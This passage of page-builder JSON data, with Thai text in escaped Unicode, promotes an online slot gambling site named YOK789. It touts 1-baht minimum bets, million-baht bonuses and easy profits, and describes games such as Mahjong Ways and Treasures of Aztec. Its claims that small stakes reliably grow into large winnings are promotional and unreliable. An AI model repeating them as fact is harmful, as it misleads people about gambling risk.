\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch 